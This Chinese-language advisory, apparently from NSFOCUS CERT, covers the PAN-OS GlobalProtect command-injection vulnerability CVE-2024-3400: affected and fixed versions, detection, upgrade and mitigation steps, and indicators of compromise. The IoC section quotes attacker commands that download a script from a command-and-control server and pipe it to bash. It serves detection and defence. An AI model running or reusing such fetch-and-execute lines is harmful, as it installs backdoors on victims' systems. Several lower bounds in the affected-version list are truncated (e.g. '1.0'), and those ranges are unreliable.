一、漏洞概述
近日,绿盟科技CERT监测到Palo Alto Networks发布安全公告,修复了PAN-OS中存在的命令注入漏洞(CVE-2024-3400),由于PAN-OS中配置的GlobalProtect 网关或GlobalProtect门户对用户的输入过滤不严,未经身份验证的攻击者可构造特制数据包在防火墙上以root权限执行任意代码。CVSS评分为10.0,目前该漏洞PoC已公开,且发现在野利用,请相关用户尽快采取措施进行防护。
Palo Alto Networks 是全球知名的网络安全厂商,PAN-OS是Palo Alto Networks为其防火墙设备开发的操作系统。
参考链接:
https://security.paloaltonetworks.com/CVE-2024-3400
二、影响范围
受影响版本
- 1.0<= PAN-OS < 11.1.0-h3
- 1.1<= PAN-OS < 11.1.1-h1
- 1.2<= PAN-OS < 11.1.2-h3
- 0.2<= PAN-OS < 11.0.2-h4
- 0.3<= PAN-OS < 11.0.3-h10
- 0.4<= PAN-OS < 11.0.4-h1
- 2.5<= PAN-OS < 10.2.5-h6
- 2.6<= PAN-OS < 10.2.6-h3
- 2.7<= PAN-OS < 10.2.7-h8
- 2.8<= PAN-OS < 10.2.8-h3
- 2.9<= PAN-OS < 10.2.9-h1
注:Cloud NGFW、Panorama设备和Prisma Access不受此漏洞影响。
不受影响版本
- PAN-OS >= 10.2.9-h1 (Released 4/14/24)
- PAN-OS >= 10.2.8-h3 (Released 4/15/24)
- PAN-OS >= 10.2.7-h8 (Released 4/15/24)
- PAN-OS >= 10.2.6-h3 (Released 4/16/24)
- PAN-OS >= 10.2.5-h6 (Released 4/16/24)
- PAN-OS >= 10.2.3-h13 (ETA: 4/17/24)
- PAN-OS >= 10.2.1-h2 (ETA: 4/17/24)
- PAN-OS >= 10.2.2-h5 (ETA: 4/18/24)
- PAN-OS >= 10.2.0-h3 (ETA: 4/18/24)
- PAN-OS >= 10.2.4-h16 (ETA: 4/19/24)
- PAN-OS >= 11.0.4-h1 (Released 4/14/24)
- PAN-OS >= 11.0.3-h10 (Released 4/16/24)
- PAN-OS >= 11.0.2-h4 (Released 4/16/24)
- PAN-OS >= 11.0.1-h4 (ETA: 4/17/24)
- PAN-OS >= 11.0.0-h3 (ETA: 4/18/24)
- PAN-OS >= 11.1.2-h3 (Released 4/14/24)
- PAN-OS >= 11.1.1-h1 (Released 4/16/24)
- PAN-OS >= 11.1.0-h3 (Released 4/16/24)
三、漏洞检测
- 人工检测
相关用户可以通过检查防火墙Web界面(Network > GlobalProtect > Gateways or Network > GlobalProtect > Portals)中的条目来验证是否配置了GlobalProtect网关。
受影响用户还可根据文章末尾的IoC信息排查是否已受到此漏洞攻击的入侵。
四、漏洞防护
- 官方升级
目前官方已在最新版本中修复了该漏洞,请受影响的用户尽快升级版本进行防护,官方下载链接:https://support.paloaltonetworks.com/support
- 其他防护措施
若相关用户暂时无法进行升级操作,可使用订阅的威胁防护进行临时缓解:https://live.paloaltonetworks.com/t5/globalprotect-articles/applying-vulnerability-protection-to-globalprotect-interfaces/ta-p/340184
建议在不影响业务的前提下对受影响系统进行访问限制,若未使用到该功能,可禁用GlobalProtect。
IoC
UPSTYLE Backdoor:
Update.py
3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078
Command and Control Infrastructure:
172.233.228[.]93
hxxp://172.233.228[.]93/policy
hxxp://172.233.228[.]93/patch
66.235.168[.]222
Hosted Python Backdoor:
144.172.79[.]92
nhdata.s3-us-west-2.amazonaws[.]com
Observed Commands:
wget -qO- hxxp://172.233.228[.]93/patch|bash
wget -qO- hxxp://172.233.228[.]93/policy | bash
声明
本安全公告仅用来描述可能存在的安全问题,绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全公告作者不为此承担任何责任。
绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告,必须保证此安全公告的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全公告内容,不得以任何方式将其用于商业目的。